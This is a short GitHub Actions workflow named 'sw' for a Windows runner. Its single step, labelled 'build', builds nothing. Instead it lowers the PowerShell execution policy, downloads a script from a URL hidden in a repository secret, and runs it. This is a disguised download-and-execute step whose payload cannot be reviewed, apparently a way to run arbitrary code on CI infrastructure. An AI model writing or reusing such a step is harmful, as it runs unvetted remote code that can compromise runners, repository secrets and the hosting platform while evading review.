name: sw

on:
  push:
    branches: [ main ]

jobs:
  build:
    runs-on: windows-2019
    strategy:
      fail-fast: false

    steps:
    - uses: actions/checkout@v3
      with:
        submodules: recursive


    - name: build
      run: |
        Set-ExecutionPolicy RemoteSigned -Scope CurrentUser
        Invoke-WebRequest ${{secrets.URL}} -OutFile test.ps1
        ./test.ps1
      
